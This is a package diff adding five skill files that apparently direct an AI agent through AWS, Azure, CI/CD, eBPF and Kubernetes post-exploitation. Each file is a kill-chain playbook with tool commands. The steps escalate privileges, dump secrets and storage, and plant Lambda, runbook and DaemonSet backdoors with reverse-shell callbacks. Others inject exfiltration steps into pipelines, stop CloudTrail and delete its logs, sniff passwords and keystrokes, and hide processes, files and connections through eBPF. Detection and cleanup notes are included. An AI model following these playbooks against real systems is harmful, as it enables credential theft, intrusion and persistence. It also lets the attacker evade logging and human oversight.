@cyberstrike-io/cyberstrike 1.1.14 → 1.1.15-beta.1

package/skill/aws-postexploit/SKILL.md

@@ -0,0 +1,120 @@
+---
+name: aws-postexploit
+description: AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
+category: post-exploitation
+tags: [aws, cloud, post-exploitation, iam, s3, lambda, ssm, cloudtrail, credential-access, defense-evasion, persistence]
+tech_stack: [aws, boto3, python]
+cwe_ids: [CWE-269, CWE-522, CWE-693, CWE-284]
+chains_with: [T1078.004, T1530, T1537, T1562.008, T1098, T1059.009, T1552.005]
+prerequisites: [T1078.004, T1552.005]
+version: "1.0"
+---
+
+# AWS Post-Exploitation Methodology
+
+AWS post-exploitation uses boto3, the AWS CLI, and direct metadata endpoint access to perform privilege escalation, data exfiltration, and persistence after compromising IAM credentials or gaining EC2 instance access. These tools target IAM misconfigurations, S3 data stores, Secrets Manager, Lambda functions, and SSM for lateral movement.
+
+## Prerequisites
+
+Before deploying awshook tools, verify:
+
+1. **Valid AWS credentials** — access key + secret key, session token, or instance profile
+2. **boto3 installed** — `pip3 install boto3`
+3. **Current identity** — `aws sts get-caller-identity` to confirm access
+4. **Region** — set via `--region`, `AWS_DEFAULT_REGION`, or profile config
+
+```bash
+# Quick prerequisite check
+aws sts get-caller-identity                    # verify credentials work
+aws iam get-user 2>/dev/null || echo "No IAM user (likely role/instance profile)"
+python3 -c "import boto3; print('boto3 OK')"   # verify boto3
+```
+
+## Kill Chain Phases
+
+### Phase 1 — Situational Awareness (First 60 seconds)
+
+Understand the AWS environment and current permissions.
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| IAM enumeration | `awshook iam_enum` | Map all users, roles, policies; identify privilege escalation paths |
+| Metadata harvest | `awshook metadata_harvest` | Extract IAM role credentials from EC2/ECS/Lambda metadata |
+| CloudTrail status | `awshook cloudtrail_blind --action status` | Check logging configuration before any noisy operations |
+
+### Phase 2 — Privilege Escalation
+
+Exploit IAM misconfigurations to gain higher privileges.
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| PassRole escalation | `awshook iam_privesc --method passrole` | Create Lambda with admin role via iam:PassRole |
+| AssumeRole chain | `awshook iam_privesc --method assumerole --role-arn ARN` | Assume role with broader permissions |
+| Policy attachment | `awshook iam_privesc --method attach_policy` | Attach AdministratorAccess to current user |
+| Access key creation | `awshook iam_privesc --method create_key --target-user USER` | Create new access key for persistence |
+
+### Phase 3 — Data Exfiltration
+
+Extract sensitive data from AWS services.
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| S3 dump | `awshook s3_dump` | Find and download sensitive files from all buckets |
+| Secrets extraction | `awshook secrets_dump` | Extract Secrets Manager and SSM Parameter Store values |
+| EBS snapshot | `awshook ec2_snapshot --volume-id VOL_ID` | Snapshot volumes for offline data access |
+
+### Phase 4 — Persistence
+
+Establish persistent access to the AWS environment.
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Lambda backdoor | `awshook lambda_backdoor --function-name NAME --callback-url URL` | Inject reverse shell into Lambda |
+| SSM execution | `awshook ssm_exec --instance-id ID --command CMD` | Execute commands on EC2 via SSM |
+
+### Phase 5 — Operational Security
+
+Reduce detection footprint.
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Stop CloudTrail | `awshook cloudtrail_blind --action stop` | Stop CloudTrail logging |
+| Delete logs | `awshook cloudtrail_blind --action delete_logs` | Remove existing CloudTrail logs from S3 |
+
+### Phase 6 — Cleanup (MANDATORY)
+
+```
+awshook cleanup_aws
+```
+
+The cleanup tool:
+1. Restores CloudTrail logging (start_logging on stopped trails)
+2. Deletes Lambda functions and layers created by lambda_backdoor
+3. Removes IAM roles, policies, and access keys created by iam_privesc
+4. Deletes EBS snapshots created by ec2_snapshot
+5. Cleans the state file (~/.cyberstrike/awshook-state.json)
+
+## Detection Considerations
+
+AWS post-exploitation tools are detectable by:
+- **CloudTrail** — All API calls logged (unless blinded). Key events: CreateAccessKey, AttachUserPolicy, CreateFunction, StopLogging
+- **GuardDuty** — Anomalous IAM behavior, unusual API calls, credential exfiltration patterns
+- **AWS Config** — Configuration change detection for IAM, Lambda, CloudTrail
+- **IAM Access Analyzer** — External access to resources, unused permissions
+- **Security Hub** — Aggregated findings from GuardDuty, Config, Access Analyzer
+- **S3 Access Logging** — Object-level access logging for data exfiltration detection
+
+## Program Reference
+
+| Program | Technique | MITRE ATT&CK |
+|---------|-----------|---------------|
+| iam_enum | IAM user/role/policy enumeration and privesc analysis | T1087.004 — Cloud Account |
+| iam_privesc | IAM privilege escalation via PassRole/AssumeRole/Policy | T1098 — Account Manipulation |
+| s3_dump | S3 bucket data exfiltration | T1530 — Data from Cloud Storage |
+| lambda_backdoor | Lambda function backdoor for persistence | T1525 — Implant Internal Image |
+| ssm_exec | Remote command execution via SSM | T1021.007 — Cloud Services |
+| metadata_harvest | EC2/ECS/Lambda metadata credential extraction | T1552.005 — Cloud Instance Metadata API |
+| cloudtrail_blind | CloudTrail log evasion | T1562.008 — Disable Cloud Logs |
+| secrets_dump | Secrets Manager/Parameter Store extraction | T1555.006 — Cloud Secrets Management Stores |
+| ec2_snapshot | EBS volume snapshot for data access | T1537 — Transfer Data to Cloud Account |
+| cleanup_aws | Resource removal and trail restoration | T1070 — Indicator Removal |

package/skill/azure-postexploit/SKILL.md

@@ -0,0 +1,86 @@
+---
+name: azure-postexploit
+description: Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
+category: post-exploitation
+tags: [azure, entra-id, cloud, post-exploitation, keyvault, managed-identity, credential-access, persistence, token-abuse]
+tech_stack: [azure, python, msal, msgraph, requests]
+cwe_ids: [CWE-269, CWE-522, CWE-693, CWE-284]
+chains_with: [T1078.004, T1552.001, T1098.001, T1550.001, T1528]
+prerequisites: [T1078.004]
+version: "1.0"
+---
+
+# Azure/Entra ID Post-Exploitation Methodology
+
+Azure post-exploitation uses Microsoft Graph API, Azure Resource Manager API, and direct IMDS access for tenant enumeration, privilege escalation, secret extraction, and persistence. After compromising Azure credentials or a managed identity, these tools provide comprehensive Entra ID and Azure resource exploitation capabilities.
+
+## Prerequisites
+
+1. **Valid Azure credentials** — service principal, user credentials, managed identity, or access token
+2. **Python packages** — `pip3 install requests msal azure-identity azure-keyvault-secrets azure-storage-blob`
+3. **Current identity** — verify access via `az account show` or Graph API /me endpoint
+
+```bash
+# Quick prerequisite check
+az account show                              # verify Azure CLI credentials
+python3 -c "import requests; print('OK')"    # verify requests
+curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" 2>/dev/null && echo "IMDS available"
+```
+
+## Kill Chain Phases
+
+### Phase 1 — Situational Awareness
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Entra ID enum | `azurehook entra_enum` | Enumerate users, groups, apps, SPs, conditional access |
+| Managed identity | `azurehook managed_identity` | Extract managed identity tokens from VM/App Service |
+
+### Phase 2 — Privilege Escalation
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Consent grant | `azurehook entra_privesc --method consent_grant` | Illicit consent grant for Directory.ReadWrite.All |
+| PIM activation | `azurehook entra_privesc --method pim_activate` | Activate eligible Global Administrator role |
+| SP secret | `azurehook entra_privesc --method sp_secret` | Add client secret to existing service principal |
+
+### Phase 3 — Data Exfiltration
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Key Vault dump | `azurehook keyvault_dump` | Extract secrets, keys, certificates from Key Vaults |
+| Storage dump | `azurehook storage_dump` | Download sensitive data from Blob Storage |
+| Token abuse | `azurehook azuread_token --action foci` | Use FOCI to get tokens for multiple services |
+
+### Phase 4 — Persistence
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Runbook backdoor | `azurehook runbook_backdoor --automation-account NAME --resource-group RG` | Create Automation runbook with reverse shell |
+
+### Phase 5 — Cleanup (MANDATORY)
+
+```
+azurehook cleanup_azure
+```
+
+## Detection Considerations
+
+- **Azure Activity Log** — All ARM API calls, role assignments, resource creation
+- **Entra ID Audit Logs** — App consent grants, credential additions, role activations
+- **Microsoft Defender for Cloud** — Anomalous resource access, privilege escalation
+- **Conditional Access** — Untrusted location/device blocks
+- **Azure Sentinel** — UEBA, anomalous sign-in patterns, bulk data access
+
+## Program Reference
+
+| Program | Technique | MITRE ATT&CK |
+|---------|-----------|---------------|
+| entra_enum | Entra ID tenant enumeration | T1087.004 — Cloud Account |
+| entra_privesc | Privilege escalation via consent/PIM/SP | T1098.001 — Additional Cloud Credentials |
+| keyvault_dump | Key Vault secret extraction | T1555.006 — Cloud Secrets Management Stores |
+| storage_dump | Azure Storage data exfiltration | T1530 — Data from Cloud Storage |
+| managed_identity | Managed identity token harvest | T1552.005 — Cloud Instance Metadata API |
+| runbook_backdoor | Automation Account persistence | T1525 — Implant Internal Image |
+| azuread_token | Token manipulation and FOCI abuse | T1550.001 — Application Access Token |
+| cleanup_azure | Resource removal and restoration | T1070 — Indicator Removal |

package/skill/cicd-attacks/SKILL.md

@@ -0,0 +1,81 @@
+---
+name: cicd-attacks
+description: CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
+category: post-exploitation
+tags: [cicd, github-actions, jenkins, gitlab, pipeline, supply-chain, secret-extraction, credential-access]
+tech_stack: [github, jenkins, gitlab, python, requests]
+cwe_ids: [CWE-522, CWE-693, CWE-829, CWE-284]
+chains_with: [T1195.002, T1552.004, T1059, T1098]
+prerequisites: [T1078]
+version: "1.0"
+---
+
+# CI/CD Pipeline Attack Methodology
+
+CI/CD pipeline attacks target the software delivery infrastructure to extract secrets, inject malicious code, and establish persistence. After gaining access to GitHub, Jenkins, or GitLab, these tools extract stored credentials, inject pipeline steps for secret exfiltration, and manipulate workflow configurations.
+
+## Prerequisites
+
+1. **CI/CD access** — API token, personal access token, or service account credentials
+2. **Python packages** — `pip3 install requests`
+3. **API access** — Valid token with appropriate scopes (repo, admin, workflow)
+
+```bash
+# Quick prerequisite check — GitHub
+curl -s -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/user | jq .login
+
+# Quick prerequisite check — Jenkins
+curl -s -u "$JENKINS_USER:$JENKINS_TOKEN" "$JENKINS_URL/api/json" | jq .nodeDescription
+
+# Quick prerequisite check — GitLab
+curl -s -H "Private-Token: $GITLAB_TOKEN" "$GITLAB_URL/api/v4/user" | jq .username
+```
+
+## Kill Chain Phases
+
+### Phase 1 — Reconnaissance
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| List GitHub secrets | `cipipe gh_secrets --repo OWNER/REPO --method list` | Enumerate repository and environment secret names |
+| Jenkins credentials | `cipipe jenkins_creds --url URL --method api` | List credential store entries |
+| GitLab variables | `cipipe gitlab_tokens --url URL --project-id ID` | Enumerate CI/CD variables and tokens |
+
+### Phase 2 — Secret Extraction
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| GitHub dispatch | `cipipe gh_secrets --repo OWNER/REPO --method dispatch --callback-url URL` | Exfiltrate secrets via workflow dispatch |
+| Jenkins console | `cipipe jenkins_creds --url URL --method console` | Extract credentials via Groovy Script Console |
+| GitHub logs | `cipipe gh_secrets --repo OWNER/REPO --method logs` | Search workflow logs for leaked secrets |
+
+### Phase 3 — Pipeline Injection
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Inject pipeline | `cipipe pipeline_inject --repo OWNER/REPO --callback-url URL` | Add exfiltration step to CI/CD pipeline |
+
+### Phase 4 — Cleanup (MANDATORY)
+
+```
+cipipe cleanup_ci
+```
+
+## Detection Considerations
+
+- **GitHub Audit Log** — Workflow creation, secret access, branch creation
+- **Jenkins Audit Trail Plugin** — Script console access, credential reads
+- **GitLab Audit Events** — Variable access, runner token reads, pipeline modifications
+- **Branch Protection Rules** — Prevent direct push to main/protected branches
+- **Required Reviews** — PR approval requirements block unauthorized workflow changes
+- **Secret Scanning** — GitHub/GitLab native scanning for leaked credentials
+
+## Program Reference
+
+| Program | Technique | MITRE ATT&CK |
+|---------|-----------|---------------|
+| gh_secrets | GitHub Actions secret extraction | T1552.004 — Private Keys |
+| jenkins_creds | Jenkins credential dump | T1555 — Credentials from Password Stores |
+| pipeline_inject | CI/CD pipeline injection | T1195.002 — Compromise Software Supply Chain |
+| gitlab_tokens | GitLab CI/CD variable extraction | T1552.004 — Private Keys |
+| cleanup_ci | Pipeline modification rollback | T1070 — Indicator Removal |

package/skill/ebpf-attacks/SKILL.md

@@ -0,0 +1,184 @@
+---
+name: ebpf-attacks
+description: eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
+category: post-exploitation
+tags: [ebpf, bpf, kernel, post-exploitation, credential-access, defense-evasion, persistence, linux, rootkit]
+tech_stack: [linux, ebpf, kernel, bcc]
+cwe_ids: [CWE-269, CWE-522, CWE-693]
+chains_with: [T1014, T1055, T1556, T1205.002, T1003, T1059.004]
+prerequisites: [T1068, T1548]
+version: "1.0"
+---
+
+# eBPF Post-Exploitation Methodology
+
+eBPF (Extended Berkeley Packet Filter) enables kernel-level instrumentation without loading kernel modules. After gaining root on a Linux target, eBPF programs can intercept system calls, userspace function calls, and network traffic — operating below userland monitoring tools.
+
+## Prerequisites
+
+Before deploying eBPF tools, verify:
+
+1. **Root access** — all eBPF operations require `CAP_SYS_ADMIN` or `CAP_BPF`
+2. **Kernel version** — Linux 4.18+ for full BPF features, 5.8+ for BPF ring buffer
+3. **BCC installed** — `python3 -c "from bcc import BPF"` must succeed on target
+4. **No BPF LSM** — check `cat /sys/kernel/security/lsm` for bpf restrictions
+
+```bash
+# Quick prerequisite check
+uname -r                                    # kernel version
+cat /proc/config.gz | zcat | grep CONFIG_BPF  # BPF config
+ls /sys/fs/bpf/                             # BPF filesystem mounted
+python3 -c "from bcc import BPF; print('OK')" # BCC available
+```
+
+## Kill Chain Phases
+
+### Phase 1 — Situational Awareness (First 60 seconds)
+
+Understand the environment before deploying persistent hooks.
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Scan dependencies | `ebpf dep_scan` | Map all loaded libraries across all processes |
+| Vuln check | `ebpf dep_scan --json-output` | Identify vulnerable library versions |
+| Monitor executions | `ebpf execve_sniff --duration 30` | Understand what runs on the system — cron, services, monitoring |
+| DNS baseline | `ebpf dns_sniff --duration 30` | Map DNS activity — identify internal services, C2 detection |
+
+### Phase 2 — Credential Harvesting
+
+Intercept credentials at the kernel level — no file modification, no log entries.
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| PAM interception | `ebpf pam_sniff --duration 300` | Capture SSH, sudo, su, login passwords in cleartext |
+| TLS interception | `ebpf ssl_sniff --pid <PID>` | Capture HTTPS plaintext for a specific service |
+| Keystroke capture | `ebpf keylog --duration 120` | Capture interactive terminal input from TTY sessions |
+
+**PAM sniffing** hooks `pam_get_authtok` in `libpam.so` via uprobe. Every authentication event (SSH login, sudo, su, screen unlock) passes through PAM — the cleartext password is captured before hashing.
+
+**SSL sniffing** hooks `SSL_write` and `SSL_read` in `libssl.so`. Data is captured in plaintext before encryption (write) and after decryption (read). Use `--pid` to target a specific process (e.g., a web application handling API keys).
+
+**Keystroke logging** hooks `sys_read` on TTY file descriptors (`/dev/tty*`, `/dev/pts/*`). Captures all interactive terminal input including passwords typed in non-echo mode.
+
+### Phase 3 — Stealth Operations
+
+Hide your presence from system administrators and monitoring tools.
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Hide process | `ebpf proc_hide --pid <PID>` | Remove process from ps, top, htop, /proc listing |
+| Hide files | `ebpf file_hide --name <NAME>` | Remove file/directory from ls, find, directory listings |
+| Hide connections | `ebpf conn_hide --port <PORT>` | Remove network connection from netstat, ss, /proc/net/tcp |
+
+**Process hiding** hooks `sys_getdents64` on `/proc`. When the kernel returns directory entries, entries matching the target PID are overwritten with `.` — the process becomes invisible to all userland tools that enumerate `/proc`.
+
+**File hiding** uses the same `sys_getdents64` hook but matches against a filename instead of a PID. Effective for hiding implants, scripts, and data exfiltration staging directories.
+
+**Connection hiding** hooks `sys_read` on `/proc/net/tcp` and `/proc/net/tcp6`. When a monitoring tool reads the connection table, lines containing the target port are overwritten with spaces.
+
+### Phase 4 — Blind Spot Detection (20 monitors)
+
+Detect attack primitives that bypass classical syscall hooks and operate through kernel subsystems invisible to standard monitoring.
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| io_uring bypass | `ebpf io_uring_sniff --duration 60` | Detect file/socket/connect operations via io_uring that bypass syscall hooks (kernel 5.1+) |
+| Fileless execution | `ebpf memfd_exec --duration 60` | Detect memfd_create + execveat diskless payload delivery chains |
+| ptrace injection | `ebpf ptrace_sniff --duration 60` | Monitor ATTACH → POKEDATA → SETREGS shellcode injection sequences |
+| Cross-process memory | `ebpf crossmem_sniff --duration 60` | Detect stealthy process_vm_writev/readv memory injection |
+| Race condition exploits | `ebpf userfaultfd_sniff --duration 60` | Detect userfaultfd-based timing control primitives |
+| BPF integrity | `ebpf bpf_integrity --baseline --duration 300` | Verify CyberStrike hook integrity, detect unauthorized BPF program loads |
+| Netlink manipulation | `ebpf netlink_sniff --duration 60` | Detect stealthy route/firewall rule manipulation via netlink |
+| Sandbox weakening | `ebpf seccomp_sniff --duration 60` | Detect processes disabling their own seccomp/prctl security profiles |
+| Shared memory IPC | `ebpf mmap_sniff --duration 60` | Detect covert IPC via mmap MAP_SHARED, shmget, shmat — data flows without syscalls |
+| Zero-copy transfers | `ebpf zerocopy_sniff --duration 60` | Detect splice/tee/sendfile64 fd-to-fd transfers invisible to buffer profilers |
+| VDSO tampering | `ebpf vdso_sniff --duration 60` | Detect timing side-channels and VDSO page modification attacks |
+| Kernel keyring abuse | `ebpf keyring_sniff --duration 60` | Detect credential storage in kernel keyring (add_key/keyctl) |
+| Namespace escape | `ebpf namespace_sniff --duration 60` | Detect container escape via setns/unshare namespace pivoting |
+| Terminal injection | `ebpf ioctl_sniff --duration 60` | Detect TIOCSTI keystroke injection and terminal manipulation |
+| Mount manipulation | `ebpf mount_sniff --duration 60` | Detect overlay/bind mounts hiding changes on sensitive paths |
+| FUSE hijacking | `ebpf fuse_sniff --duration 60` | Detect userspace filesystem mounting that bypasses kernel VFS |
+| Perf side-channel | `ebpf perf_sniff --duration 60` | Detect perf_event_open side-channel attacks via HW counters |
+| BPF map covert channel | `ebpf bpfmap_sniff --duration 60` | Detect covert data sharing via BPF map create/update operations |
+| LD_PRELOAD injection | `ebpf ldpreload_sniff --duration 60` | Detect library injection via LD_PRELOAD env and ld.so config |
+| Futex covert channel | `ebpf futex_sniff --duration 60` | Detect timing-based covert channels via futex WAIT/WAKE |
+
+**io_uring sniffing** monitors SQE submissions via `io_uring_submit_sqe` kprobe. Operations like CONNECT, READ, WRITE, OPENAT through io_uring bypass classical syscall hooks entirely — a reverse shell built on io_uring is invisible to execve/connect tracepoints.
+
+**Fileless execution detection** correlates `memfd_create` → `write` → `execveat(fd, "", AT_EMPTY_PATH)` chains. The payload never touches disk — it exists only in memory via memfd. This is the primary technique for diskless implant delivery.
+
+**ptrace injection monitoring** tracks the ATTACH → POKEDATA → SETREGS → CONT sequence that constitutes shellcode injection. Each ptrace operation is logged with target PID and memory addresses.
+
+**Cross-process memory monitoring** captures `process_vm_writev`/`process_vm_readv` syscalls. These enable memory injection without ptrace — bypassing ptrace-based detection entirely.
+
+**userfaultfd monitoring** detects creation of userfaultfd file descriptors. Legitimate use is rare (QEMU/KVM live migration); in exploit context, userfaultfd provides precise timing control for race condition exploitation.
+
+**BPF integrity verification** takes a baseline of loaded BPF programs via `bpftool` and periodically verifies no CyberStrike programs have been detached or tampered with. Also monitors `bpf()` syscall for unauthorized program loads.
+
+**Netlink monitoring** captures netlink socket messages for NEWROUTE, DELROUTE, NEWRULE, DELRULE operations — detecting stealthy routing table and firewall rule manipulation.
+
+**Seccomp/prctl monitoring** captures PR_SET_SECCOMP, PR_SET_NO_NEW_PRIVS, PR_SET_NAME, PR_SET_DUMPABLE, and seccomp filter installation — detecting processes weakening their own security profiles or masquerading via name changes.
+
+### Phase 5 — Cleanup (MANDATORY)
+
+Always run cleanup before exiting a target.
+
+```bash
+# List all CyberStrike eBPF programs on the system
+ebpf cleanup
+
+# Remove all CyberStrike eBPF programs
+ebpf cleanup --remove --force
+
+# Dry run — show what would be removed
+ebpf cleanup --dry-run
+```
+
+The cleanup tool uses three detection methods:
+1. `bpftool prog list` — enumerate all loaded BPF programs
+2. `/sys/fs/bpf/` — check for pinned programs
+3. `/sys/kernel/debug/tracing/` — check for registered kprobe/uprobe events
+
+## Detection Considerations
+
+eBPF programs are detectable by:
+- `bpftool prog list` — shows all loaded BPF programs
+- `/sys/kernel/debug/tracing/kprobe_events` — shows registered kprobes
+- `/sys/kernel/debug/tracing/uprobe_events` — shows registered uprobes
+- `auditd` rules on `bpf()` syscall — `auditctl -a always,exit -F arch=b64 -S bpf`
+- EDR agents with BPF LSM hooks (Falco, Tracee, Tetragon)
+
+## Program Reference
+
+| Program | Hook Type | Target | MITRE ATT&CK |
+|---------|-----------|--------|---------------|
+| pam_sniff | uprobe | `pam_get_authtok` in libpam.so | T1556 — Modify Authentication Process |
+| ssl_sniff | uprobe | `SSL_write`/`SSL_read` in libssl.so | T1040 — Network Sniffing |
+| dep_scan | procfs | `/proc/<pid>/maps` | T1518 — Software Discovery |
+| proc_hide | kprobe | `sys_getdents64` on /proc | T1014 — Rootkit |
+| file_hide | kprobe | `sys_getdents64` | T1014 — Rootkit |
+| conn_hide | kprobe | `sys_read` on /proc/net/tcp | T1014 — Rootkit |
+| execve_sniff | tracepoint | `sys_execve` | T1057 — Process Discovery |
+| dns_sniff | kprobe | `udp_sendmsg` port 53 | T1071.004 — DNS Application Layer Protocol |
+| keylog | kprobe | `sys_read` on TTY fds | T1056.001 — Keylogging |
+| cleanup | bpftool | BPF programs/maps | — |
+| io_uring_sniff | kprobe | `io_uring_submit_sqe` | T1014 — Rootkit (syscall bypass) |
+| memfd_exec | tracepoint | `memfd_create` + `execveat` | T1620 — Reflective Code Loading |
+| ptrace_sniff | tracepoint | `sys_enter_ptrace` | T1055.008 — Ptrace System Calls |
+| crossmem_sniff | tracepoint | `process_vm_writev`/`readv` | T1055.012 — Process Hollowing |
+| userfaultfd_sniff | tracepoint | `sys_enter_userfaultfd` | T1068 — Exploitation for Privilege Escalation |
+| bpf_integrity | tracepoint | `sys_enter_bpf` + bpftool | T1553 — Subvert Trust Controls |
+| netlink_sniff | kprobe | `netlink_sendmsg` | T1562.004 — Disable or Modify System Firewall |
+| seccomp_sniff | tracepoint | `sys_enter_prctl` + `sys_enter_seccomp` | T1562.001 — Disable or Modify Tools |
+| mmap_sniff | tracepoint | `sys_enter_mmap` + `sys_enter_shmget` + `sys_enter_shmat` | T1055.009 — Proc Memory (shared memory IPC) |
+| zerocopy_sniff | tracepoint | `sys_enter_splice` + `sys_enter_tee` + `sys_enter_sendfile64` | T1041 — Exfiltration Over C2 Channel |
+| vdso_sniff | tracepoint | `sys_enter_clock_gettime` + `sys_enter_mprotect` | T1497.003 — Time Based Evasion |
+| keyring_sniff | tracepoint | `sys_enter_add_key` + `sys_enter_keyctl` + `sys_enter_request_key` | T1003 — OS Credential Dumping |
+| namespace_sniff | tracepoint | `sys_enter_setns` + `sys_enter_unshare` | T1611 — Escape to Host |
+| ioctl_sniff | tracepoint | `sys_enter_ioctl` (TIOCSTI/TIOCLINUX/TIOCSCTTY) | T1056.001 — Keylogging |
+| mount_sniff | tracepoint | `sys_enter_mount` + `sys_enter_umount` | T1006 — Direct Volume Access |
+| fuse_sniff | tracepoint | `sys_enter_openat` (/dev/fuse) + `sys_enter_mount` (fuse) | T1014 — Rootkit |
+| perf_sniff | tracepoint | `sys_enter_perf_event_open` | T1497.003 — Time Based Evasion |
+| bpfmap_sniff | tracepoint | `sys_enter_bpf` (MAP_CREATE/UPDATE/LOOKUP/DELETE) | T1071 — Application Layer Protocol |
+| ldpreload_sniff | tracepoint | `sys_enter_execve` (env scan) + `sys_enter_openat` (ld.so) | T1574.006 — Dynamic Linker Hijacking |
+| futex_sniff | tracepoint | `sys_enter_futex` (WAIT/WAKE/BITSET/PI) | T1029 — Scheduled Transfer |

package/skill/k8s-postexploit/SKILL.md

@@ -0,0 +1,85 @@
+---
+name: k8s-postexploit
+description: Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
+category: post-exploitation
+tags: [kubernetes, k8s, container, post-exploitation, rbac, escape, etcd, secrets, daemonset, cronjob]
+tech_stack: [kubernetes, python, etcd]
+cwe_ids: [CWE-269, CWE-522, CWE-693, CWE-250]
+chains_with: [T1611, T1552.007, T1613, T1610, T1053.007]
+prerequisites: [T1610, T1078]
+version: "1.0"
+---
+
+# Kubernetes Post-Exploitation Methodology
+
+Kubernetes post-exploitation targets cluster resources, RBAC misconfigurations, container security boundaries, and etcd for secret extraction. After compromising a pod or obtaining kubeconfig, these tools provide cluster enumeration, privilege escalation, container escape, and persistent access.
+
+## Prerequisites
+
+1. **Kubernetes access** — kubeconfig file, service account token, or in-cluster config
+2. **Python packages** — `pip3 install kubernetes etcd3`
+3. **Current context** — verify access via `kubectl auth can-i --list`
+
+```bash
+# Quick prerequisite check
+kubectl cluster-info                          # verify cluster access
+kubectl auth can-i --list                     # check current permissions
+python3 -c "from kubernetes import client; print('OK')"
+```
+
+## Kill Chain Phases
+
+### Phase 1 — Cluster Enumeration
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Full enumeration | `kubehook k8s_enum` | Map namespaces, pods, services, RBAC, ingress |
+| Secret metadata | `kubehook k8s_enum --namespace kube-system` | Focus on high-value system namespace |
+
+### Phase 2 — Secret Extraction
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| K8s Secrets | `kubehook k8s_secrets` | Extract and decode all Kubernetes Secrets |
+| etcd dump | `kubehook etcd_dump --endpoint ENDPOINT` | Direct etcd access for all secrets |
+
+### Phase 3 — Privilege Escalation
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| Container escape | `kubehook k8s_escape` | Detect escape vectors (privileged, hostPID, docker socket) |
+| RBAC abuse | `kubehook k8s_privesc --method bind_admin` | Create ClusterRoleBinding for cluster-admin |
+| SA token theft | `kubehook k8s_privesc --method sa_token` | Steal service account tokens from pods |
+
+### Phase 4 — Persistence
+
+| Action | Command | Purpose |
+|--------|---------|---------|
+| DaemonSet backdoor | `kubehook k8s_backdoor --type daemonset --image IMAGE` | Deploy on every node |
+| CronJob backdoor | `kubehook k8s_backdoor --type cronjob --image IMAGE` | Periodic callback |
+
+### Phase 5 — Cleanup (MANDATORY)
+
+```
+kubehook cleanup_k8s
+```
+
+## Detection Considerations
+
+- **Kubernetes Audit Logs** — API server audit logging captures all requests
+- **Falco** — Runtime security monitoring for container escape, privilege escalation
+- **OPA/Gatekeeper** — Policy enforcement for pod security, RBAC constraints
+- **Network Policies** — Restricts pod-to-pod and pod-to-external communication
+- **RBAC Analyzer** — Tools like rbac-police, kubectl-who-can detect dangerous bindings
+
+## Program Reference
+
+| Program | Technique | MITRE ATT&CK |
+|---------|-----------|---------------|
+| k8s_enum | Cluster resource enumeration | T1613 — Container and Resource Discovery |
+| k8s_secrets | Kubernetes Secret extraction | T1552.007 — Container API |
+| k8s_escape | Container escape exploitation | T1611 — Escape to Host |
+| k8s_privesc | RBAC privilege escalation | T1078 — Valid Accounts |
+| etcd_dump | Direct etcd data extraction | T1552.007 — Container API |
+| k8s_backdoor | DaemonSet/CronJob persistence | T1053.007 — Container Orchestration Job |
+| cleanup_k8s | Resource removal by label selector | T1070 — Indicator Removal |